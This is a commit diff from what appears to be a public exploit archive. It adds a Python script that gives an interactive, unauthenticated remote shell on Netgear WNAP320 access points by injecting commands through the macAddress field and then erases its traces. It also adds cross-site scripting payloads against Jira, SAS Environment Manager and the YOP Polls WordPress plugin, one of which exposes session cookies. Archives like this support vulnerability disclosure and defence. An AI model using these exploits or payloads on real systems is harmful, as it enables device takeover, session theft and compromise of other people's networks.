DB: 2021-06-29

5 changes to exploits/shellcodes WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS) SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS) Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS) Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)
2021-06-29 05:01:55 +00:00 · 2021-06-29 05:01:55 +00:00 · 9008c67d8b
commit 9008c67d8b
parent 4fbb1eb22a
6 changed files with 166 additions and 1 deletions
--- a/exploits/hardware/webapps/50058.py
+++ b/exploits/hardware/webapps/50058.py
@ -5,7 +5,7 @@
 # Software Link: https://static.tp-link.com/TL-WR841N(JP)_V13_161028.zip
 # Version: TL-WR841N 0.9.1 4.0
 # Tested on: Windows 10
-# CVE : CVE-2020-35575
+# CVE : CVE-2020-35576

 import requests
 import sys
--- a/exploits/hardware/webapps/50069.py
+++ b/exploits/hardware/webapps/50069.py
@ -0,0 +1,50 @@
+# Exploit Title: Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)
+# Vulnerability: Remote Command Execution on /boardDataWW.php macAddress parameter
+# Notes: The RCE doesn't need to be authenticated
+# Date: 26/06/2021
+# Exploit Author: Bryan Leong <NobodyAtall>
+# IoT Device: Netgear WNAP320 Access Point
+# Version: WNAP320 Access Point Firmware v2.0.3
+
+import requests
+import sys
+
+if(len(sys.argv) != 2):
+	print('Must specify the IP parameter')
+	print("eg: python3 wnap320_v2_0_3.py <IP>")
+	sys.exit(0)
+
+host = sys.argv[1]
+port = 80
+
+cmd = ''
+
+while(True):
+	cmd = input('Shell_CMD$ ')
+	#injecting system command part writing the command output to a output file
+	data = {
+		'macAddress' : '112233445566;' + cmd + ' > ./output #',
+		'reginfo' : '0',
+		'writeData' : 'Submit'
+	} 
+
+	url = 'http://' + host + '/boardDataWW.php'
+	response = requests.post(url, data=data)
+
+	if(response.ok):
+		#read the command output result
+		url = 'http://' + host + '/output'
+		cmdOutput = requests.get(url)
+		print(cmdOutput.text)
+
+		#remove trace
+		cmd = 'rm ./output'
+		data = {
+			'macAddress' : '112233445566;' + cmd + ' #',
+			'reginfo' : '0',
+			'writeData' : 'Submit'
+		}
+		url = 'http://' + host + '/boardDataWW.php'
+		response = requests.post(url, data=data)
+	else:
+		print('[!] No response from the server.')
--- a/exploits/macos/webapps/50068.txt
+++ b/exploits/macos/webapps/50068.txt
@ -0,0 +1,27 @@
+# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)
+# Date: 06/05/2021
+# Exploit Author: CAPTAIN_HOOK
+# Vendor Homepage: https://www.atlassian.com/
+# Software Link: https://www.atlassian.com/software/jira/download/data-center
+# Version: versions < 8.5.14, 8.6.0 ≤ version <  8.13.6, 8.14.0 ≤ version < 8.16.1
+# Tested on: ANY
+# CVE : CVE-2021-26078
+
+Description: 								
+
+The number range searcher component in Jira Server and Jira Data Center before version 8.5.14, from version 8.6.0 before version 8.13.6, and from version 8.14.0 before version 8.16.1 allows remote attackers inject arbitrary HTML or JavaScript via across site scripting (XSS) vulnerability
+*Fixed versions:*
+
+   - 8.5.14
+   - 8.13.6	
+   - 8.16.1	
+   - 8.17.0
+
+POC:
+
+   - *Story points* custom field that exists by default in all JIRA Server has 3 types of Search template ( None , number range searcher, number searcher) By default the value of Search template is number range searcher OR number searcher. if the value of Search template was set on number range searcher the JIRA server is vulnerable to XSS attack by lowest privilege . For Testing Check the Story points custom field and it's details ( for verifying that the Search template sets on number range searcher) with your ADMIN account ( just like the images) and in the other window Type this With your least privilege
+user : jql=issuetype%20%3D%20Epic%20AND%20%22Story%20Points%22%20%3C%3D%20%22%5C%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E%22%20AND%20%22Story%20Points%22%20%3E%3D%20%221%22
+Your XSS Will be triggered immediately.
+
+Reference:
+https://jira.atlassian.com/browse/JRASERVER-72392?error=login_required&error_description=Login+required&state=9b05ec1f-587c-4014-9053-b6fdbb1efa21
--- a/exploits/multiple/webapps/50067.txt
+++ b/exploits/multiple/webapps/50067.txt
@ -0,0 +1,28 @@
+# Exploit Title: SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS)
+# Date: 24/06/2021
+# Exploit Author: Luqman Hakim Zahari @ Saitamang
+# Vendor Homepage: https://support.sas.com/en/software/environment-manager-support.html
+# Version: 2.5
+# Tested on: CentOS 7
+# CVE : CVE-2021-35475
+
+# Description #
+
+SAS® Environment Manager 2.5 allows XSS through the Name field when creating/editing a server. The XSS will prompt when editing the Configuration Properties.
+
+# Proof of Concept(PoC) # https://github.com/saitamang/CVE-2021-35475/blob/main/README.md
+
+*Steps to Reproduce:*
+
+[1.] Login to your system > On "Resource" tab > "Browse""
+[2.] Choose a "Platform"
+[3.] Click "Inventory" tab > Under "Servers" tab click "New..."
+[4.] Under "General Properties" tab on "Name" field , enter the payload(below) > Filled up other information and click "Ok" button
+
+payload : 
+
+name=XSS"><marquee onstart=confirm('XSS')>@SAITAMANG
+
+[5.] Successfully saved the payload page will shown
+[6.] Then scroll down to bottom under "Configuration Properties" tab > click "Edit" button
+[7.] Then the payload will be executed
--- a/exploits/php/webapps/50066.txt
+++ b/exploits/php/webapps/50066.txt
@ -0,0 +1,56 @@
+# Exploit Title: WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)
+# Date: 09/06/2021
+# Exploit Author: inspired - Toby Jackson
+# Vendor Homepage: https://yop-poll.com/
+# Blog Post: https://www.in-spired.xyz/discovering-wordpress-plugin-yop-polls-v6-2-7-stored-xss/
+# Software Link: https://en-gb.wordpress.org/plugins/yop-poll/
+# Version: Tested on version 6.2.7 (Older versions may be affected)
+# Tested on: WordPress
+# Category : Webapps
+
+## I. Vulnerability
+
+Stored Cross Site Scripting (XSS)
+
+## II. Product Overview
+
+The software allows users to quickly generate polls and voting systems for their blog posts without any need for programming knowledge. 
+
+## III. Exploit 
+
+When a poll is created that allows other answers and then the setting is enabled for displaying the other responses after submission, the other answer is not sanitized when displayed back to the user, showing an XSS vulnerability. It is, however, correctly sanitized when displaying the other choices on the initial vote page.
+
+## IV. Vulnerable Code
+
+The vulnerable code resides in the fact the results are echoed back to the user without any sanitization performed on the output. It also gets stored in the database as it's inserts.
+
+## IV. Proof of Concept
+
+- Create a new poll that allows other answers, with the results of the other answers being displayed after voting.
+- Set the permissions to whoever you'd like to be able to vote.
+- Place it on a blog post.
+- Insert '<script>alert('xss')</script>' into the other box.
+- Submit vote. The payload gets triggered when reflected back to users.
+- Whenever a new user votes, they will also be affected by the payload.
+
+## VI. Impact
+
+An attacker can leave stored javascript payloads to be executed whenever a user votes and views the results screen. This could lead to them stealing cookies, logging keystrokes and even stealing passwords from autocomplete forms.
+
+## VII. SYSTEMS AFFECTED
+
+WordPress websites running "YOP Polls" plugin version 6.2.7 (older versions may also be affected).
+
+## VIII. REMEDIATION
+
+Update the plugin to v6.2.8.
+
+## VIIII. DISCLOSURE TIMELINE
+-------------------------
+June 9, 2021 1: Vulnerability identified.
+June 9, 2021 2: Informed developer of the vulnerability.
+June 10, 2021 1: Vendor requested proof of concept.
+June 10, 2021 2: Sent proof of concept and accompanying details.
+June 14, 2021 1: Vendor emails to state the vulnerability has been fixed.
+June 16, 2021 1: Confirmed fix, vendor happy to disclose the vulnerability.
+June 17, 2021 1: Requested CVE Number.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -44205,3 +44205,7 @@ id,file,description,date,author,type,platform,port
 50059,exploits/hardware/webapps/50059.txt,"Huawei dg8045 - Authentication Bypass",2021-06-24,"Abdalrahman Gamal",webapps,hardware,
 50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php,
 50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,
+50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",2021-06-28,"Toby Jackson",webapps,php,
+50067,exploits/multiple/webapps/50067.txt,"SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS)",2021-06-28,"Luqman Hakim Zahari",webapps,multiple,
+50068,exploits/macos/webapps/50068.txt,"Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)",2021-06-28,Captain_hook,webapps,macos,
+50069,exploits/hardware/webapps/50069.py,"Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)",2021-06-28,"Bryan Leong",webapps,hardware,